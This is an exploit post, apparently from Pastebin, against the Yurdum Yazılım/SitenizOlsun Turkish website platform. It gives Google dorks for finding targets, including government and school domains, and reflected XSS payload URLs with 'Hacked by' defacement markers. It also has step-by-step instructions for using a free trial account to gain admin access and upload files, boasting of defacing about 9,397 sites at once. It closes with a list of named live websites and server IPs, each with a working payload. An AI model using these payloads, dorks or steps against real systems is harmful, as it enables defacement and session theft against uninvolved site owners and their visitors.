KingSkrupellos

Yurdum Yazılım SitenizOlsun Reflected XSS Add Administrator

Jun 10th, 2019
328
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.26 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Yurdum Yazılım SitenizOlsun Reflected XSS Add Administrator Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 09/06/2019
  7. # Vendor Homepages : yurdumyazilim.com ~ sitenizolsun.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : High
  11. # Vulnerability Type :
  12. CWE-79 [ Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ]
  13. CWE-671 [ Lack of Administrator Control over Security ]
  14. CWE-522 [ Insufficiently Protected Credentials ]
  15. CWE-284 [ Improper Access Control ]
  16. CWE-285 [ Improper Authorization ]
  17. # Google Dorks :
  18. inurl:/?pnum= intext:Yer sağlayıcı: Yurdum Yazılım site:tr
  19. inurl:/?pnum= intext:Yer sağlayıcı: SitenizOlsun. site:tr
  20. intext:Yer sağlayıcı: SitenizOlsun site:tr
  21. intext:Yer sağlayıcı: Yurdum Yazılım site:tr
  22. inurl:/?pnum= site:gov.tr
  23. inurl:/?pnum= site:bel.tr
  24. inurl:/?pnum= site:k12.tr
  25. inurl:/?pnum= site:org.tr
  26. inurl:/?pnum= site:com.tr
  27. inurl:/?pnum= site:com
  28. inurl:/?pnum= site:net
  29. inurl:/?pnum= site:org
  30. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  31. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  32. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  33. # Reference Link : cxsecurity.com/ascii/WLB-2019010038
  34.  
  35. ###################################################################
  36.  
  37. Impact 1 Reflected XSS Cross Site Scripting (or Non-Persistent) :
  38. *********************************************************
  39. The server reads data directly from the HTTP request and reflects it back in the
  40. HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply
  41. dangerous content to a vulnerable web application, which is then reflected back to the victim
  42. and executed by the web browser. The most common mechanism for delivering malicious
  43. content is to include it as a parameter in a URL that is posted publicly or e-mailed directly
  44. to the victim. URLs constructed in this manner constitute the core of many phishing
  45. schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site.
  46. After the site reflects the attacker's content back to the victim,the content is
  47. executed by the victim's browser. A successful exploit could allow the attacker
  48. to execute arbitrary script code in the context of the affected site
  49. and allow the attacker to access sensitive browser-based information.
  50. An attacker, for example,can exploit this vulnerability to steal cookies from
  51. the attacked user in order to hijack a session and gain access to the system.
  52.  
  53. Impact 2 Lack of Administrator Control over Security :
  54. ***********************************************
  55. The product uses security features in a way that prevents the product's administrator from
  56. tailoring security settings to reflect the environment in which the product is being used.
  57. This introduces resultant weaknesses or prevents it from operating at a level of security
  58. that is desired by the administrator.This weakness occurs when the application transmits
  59. or stores authentication credentials and uses an insecure method that is susceptible to
  60. unauthorized interception and/or retrieval.The software does not perform or incorrectly
  61. performs an authorization check when an actor attempts to access a resource or
  62. perform an action. An attacker could gain access to user accounts and access sensitive
  63. data used by the user accounts.
  64.  
  65. ###################################################################
  66.  
  67. # Reflected Cross Site Scripting XSS Exploits and Payloads :
  68. *******************************************************
  69. 1%27<marquee><font%20color=lime%20size=32>XSS-Vulnerability-Found-By-KingSkrupellos</font></marquee>
  70.  
  71. 1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  72.  
  73. /?pnum=1&pt=1%27"></h3></tr></td></table></tr></td></table></div><marquee>XSS-Vulnerability-Found-By-KingSkrupellos
  74.  
  75. /?pnum=1&pt=1%27<marquee><font%20color=lime%20size=32>KingSkrupellos</font></marquee>
  76.  
  77. /?pnum=1&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>
  78.  
  79. /?pnum=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>
  80.  
  81. /?SyfNmb=3&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>
  82.  
  83. /?SyfNmb=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>
  84.  
  85. /?Syf=4&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>
  86.  
  87. /?Syf=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>
  88.  
  89. /?product=1&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>
  90.  
  91. /?product=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>
  92.  
  93. # Add Administrator / Privilege Escalation Vulnerability :
  94. ***********************************************
  95. To Take Administrator Account Register to sitenizolsun.com => Click '' Ücretsiz Dene " [ Try Free ]
  96.  
  97. Then you will redirected to this address.
  98.  
  99. sitenizolsun.com/website-temalari?paket=6
  100.  
  101. sitenizolsun.com/website-temalari?paket=[ID-NUMBER]
  102.  
  103. Choose one packet which you want.
  104.  
  105. sitenizolsun.com/website-ucretsiz-deneme-form.php?website-theme=6&paket=6
  106.  
  107. sitenizolsun.com/website-ucretsiz-deneme-form.php?website-theme=[ID-NUMBER]&paket=[ID-NUMBER]
  108.  
  109. Ücretsiz Deneme Web Siteni Oluştur [ Create your Free Test Account ]
  110.  
  111. Create any Random username - Create Random or your real E-Mail Address - Create Title - Random Phone Number
  112.  
  113. Then Click " Sitemi Oluştur " [ Create My Website ]. Please Wait.
  114.  
  115. It will create test site and administrator e-mail address and password.
  116.  
  117. http://[TEST-TARGET-WEBSITE-HERE].denemepaketi.com
  118.  
  119. Yönetim paneli kullanıcı adınız: YOUR ADMINISTRATOR E-MAIL ADDRESS HERE
  120. Yönetim paneli şifreniz : YOUR ADMINISTRATOR PASSWORD HERE
  121.  
  122. Administrator Login Path :
  123.  
  124. /login/
  125. /login/do_login.php
  126.  
  127. One Free Test Website - But you can control approximately 9397 websites at the same.
  128.  
  129. You can upload files to the vulnerable system.
  130.  
  131. Step 1 : Go to the " Temel Sayfalar " [ Main Pages ] => Anasayfa [ Homepage ] =>
  132.  
  133. Step 2 : Click to " Anasayfayı Düzenle " [ Edit Homepage ]
  134.  
  135. Step 3 : Choose " Resim Ekle " [ Insert Image ] => Click to " Kaynak " [ Source ]
  136.  
  137. Step 4 : /syp/dosyayukle.php?DosyaTipi=2
  138.  
  139. http://[TEST-TARGET-WEBSITE-HERE].denemepaketi.com/syp/dosyayukle.php?DosyaTipi=2
  140.  
  141. You will see a yellow and white page and it says :
  142.  
  143. Step 5 : Yüklemek istediğiniz dosyaları "Gözat"a tıklayarak bilgisayarınızdan seçiniz ve "Yükle" ye tıklayınız.
  144.  
  145. [ Select the files you want to upload from your computer by clicking "Browse" and click "Upload". ]
  146.  
  147. Step 6 : Choose " Sayfaya sığdır (Resimler için geçerli) Max 30 MB "
  148.  
  149. Step 7 : Choose your .html file from your PC and upload it. But choose HTML. Click " Yükle " [ Upload ] Button.
  150.  
  151. Your File Destination :
  152.  
  153. /FileUpload/epXXXXXX/File/[yourfilename.html]
  154.  
  155. If you another sections such as " Add Header Image " or " Add Album "
  156.  
  157. Your File Destination :
  158.  
  159. /FileUpload/epXXXXXX/HeaderImages/crop/[RANDOM-NUMBERS].jpg
  160.  
  161. /FileUpload/epXXXXXX/Album/epXXXXXX_[YEAR][MONTH][DAY][RANDOM-NUMBERS].jpg
  162.  
  163. You can see your defaced indexes on 9397 websites at the same.
  164.  
  165. Congratulations :)
  166.  
  167. ###################################################################
  168.  
  169. # Example Vulnerable Sites for XSS Reflected Cross Site Scripting :
  170. ***********************************************************
  171. Vulnerable IP Addresses =>
  172.  
  173. 51.254.33.49 => There are 37 domains hosted on this server.
  174.  
  175. 81.171.1.140 => There are 8,552 domains hosted on this server.
  176.  
  177. 159.69.209.93 => There are 798 domains hosted on this server.
  178.  
  179. [+] gurelektrikotomasyon.com/?Syf=4&pt=1%27%3Cmarquee%3E%3CfAnt%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  180.  
  181. [+] giresunkesaparnavutkoy.com/?SyfNmb=2&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  182.  
  183. [+] gezintihaberleri.com/?SyfNmb=4&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  184.  
  185. [+] furkankirtasiye.com/?pnum=8&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  186.  
  187. [+] edirneselimiyeemlak.com/?Syf=13&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  188.  
  189. [+] giresunkesaparnavutkoy.com/?SyfNmb=2&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  190.  
  191. [+] doganisguvenligi.com/?Syf=21&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  192.  
  193. [+] cyberenerji.com/?pnum=9&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  194.  
  195. [+] siirtfistikpazari.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  196.  
  197. [+] saglamelektronik.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  198.  
  199. [+] radyobalkan.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  200.  
  201. [+] pediatrikkalpcerrahisi.com/?Syf=15&blg=1&ncat_id=699210&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  202.  
  203. [+] ozerdeminsaatdekorasyon.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  204.  
  205. [+] otoarizatespit.org/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  206.  
  207. [+] onaranelektrik.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  208.  
  209. [+] oabtfizik.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  210.  
  211. [+] trabzonbasket.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  212.  
  213. [+] ozelegitimaraclari.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  214.  
  215. [+] reklamfolyosu.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  216.  
  217. [+] sivasaskf.org/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  218.  
  219. [+] tablopark.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  220.  
  221. [+] vansuaritmaci.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  222.  
  223. [+] noktadusakabin.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
  224.  
  225. ###################################################################
  226.  
  227. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  228.  
  229. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment